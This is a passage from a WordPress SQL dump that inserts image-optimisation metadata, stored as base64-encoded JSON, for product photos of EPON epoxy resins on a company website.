WxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXVubW9kaWZpZWQtZXBveHktMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FcG9uLXVubW9kaWZpZWQtZXBveHktMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk5OTMsImlkIjoxOTYyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28912, 1961, 'wpfc_optimisation_reduction', '11594'); 
INSERT INTO `wp_postmeta` VALUES (28913, 1961, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHkuanBnIiwid2lkdGgiOjM2NDgsImhlaWdodCI6NTQ3MiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTk5OCwiaWQiOiIxOTYxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjQ0NCwidGltZSI6MTQ4MzU1MDAwMSwiaWQiOjE5NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS01MzN4ODAwLmpwZyIsIndpZHRoIjo1MzMsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktNTMzeDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTUzM3g4MDAuanBnIiwicmVkdWN0aW9uIjoxMDA2LCJ0aW1lIjoxNDgzNTUwMDA1LCJpZCI6MTk2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTc2OHgxMTUyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTE1MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTc2OHgxMTUyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktNzY4eDExNTIuanBnIiwicmVkdWN0aW9uIjoyMjk2LCJ0aW1lIjoxNDgzNTUwMDA5LCJpZCI6MTk2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTEwNjd4MTYwMC5qcGciLCJ3aWR0aCI6MTA2NywiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMTA2N3gxNjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMTA2N3gxNjAwLmpwZyIsInJlZHVjdGlvbiI6NTU1OSwidGltZSI6MTQ4MzU1MDAxMywiaWQiOjE5NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0MDMsInRpbWUiOjE0ODM1NTAwMTcsImlkIjoxOTYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6Mzc1LCJ0aW1lIjoxNDgzNTUwMDIwLCJpZCI6MTk2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjM4NSwidGltZSI6MTQ4MzU1MDAyMywiaWQiOjE5NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo2NjIsInRpbWUiOjE0ODM1NTAwMjcsImlkIjoxOTYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1tb2RpZmllZC1lcG94eS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tbW9kaWZpZWQtZXBveHktMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLW1vZGlmaWVkLWVwb3h5LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo0NjQsInRpbWUiOjE0ODM1NTAwMzAsImlkIjoxOTYxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28914, 1960, 'wpfc_optimisation_reduction', '21774'); 
INSERT INTO `wp_postmeta` VALUES (28915, 1960, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy5qcGciLCJ3aWR0aCI6NTQ3MiwiaGVpZ2h0IjozNjQ4LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUwMDM0LCJpZCI6IjE5NjAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MTI3MywidGltZSI6MTQ4MzU1MDAzOCwiaWQiOjE5NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyOTc5LCJ0aW1lIjoxNDgzNTUwMDQyLCJpZCI6MTk2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI2MzgsInRpbWUiOjE0ODM1NTAwNDcsImlkIjoxOTYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo4ODk2LCJ0aW1lIjoxNDgzNTUwMDUyLCJpZCI6MTk2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjkzOSwidGltZSI6MTQ4MzU1MDA1NSwiaWQiOjE5NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo3ODUsInRpbWUiOjE0ODM1NTAwNTksImlkIjoxOTYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6ODkyLCJ0aW1lIjoxNDgzNTUwMDYyLCJpZCI6MTk2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIyMDAsInRpbWUiOjE0ODM1NTAwNjYsImlkIjoxOTYwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Tb2xpZC1FcG94eS1yZXNpbnMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLVNvbGlkLUVwb3h5LXJlc2lucy0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tU29saWQtRXBveHktcmVzaW5zLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxMTcyLCJ0aW1lIjoxNDgzNTUwMDY5LCJpZCI6MTk2MH1d'); 
INSERT INTO `wp_postmeta` VALUES (28916, 1959, 'wpfc_optimisation_reduction', '2254889'); 
INSERT INTO `wp_postmeta` VALUES (28917, 1959, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Ob3ZvbGFjLXJlc2lucy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tTm92b2xhYy1yZXNpbnMuanBnIiwid2lkdGgiOjUxNTIsImhlaWdodCI6MzI2NCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tTm92b2xhYy1yZXNpbnMuanBnIiwicmVkdWN0aW9uIjoyMjU0ODgwLCJ0aW1lIjoxNDgzNTUwMDgyLCJpZCI6IjE5NTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tTm92b2xhYy1yZXNpbnMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDA4NSwiaWQiOjE5NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Ob3ZvbGFjLXJlc2lucy04MDB4NTA3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTA3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tTm92b2xhYy1yZXNpbnMtODAweDUwNy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTgwMHg1MDcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMDg4LCJpZCI6MTk1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTc2OHg0ODcuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Ob3ZvbGFjLXJlc2lucy03Njh4NDg3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tTm92b2xhYy1yZXNpbnMtNzY4eDQ4Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAwOTEsImlkIjoxOTU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tTm92b2xhYy1yZXNpbnMtMTYwMHgxMDE0LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0xNjAweDEwMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1Ob3ZvbGFjLXJlc2lucy0xNjAweDEwMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMDk1LCJpZCI6MTk1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLU5vdm9sYWMtcmVzaW5zLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsIn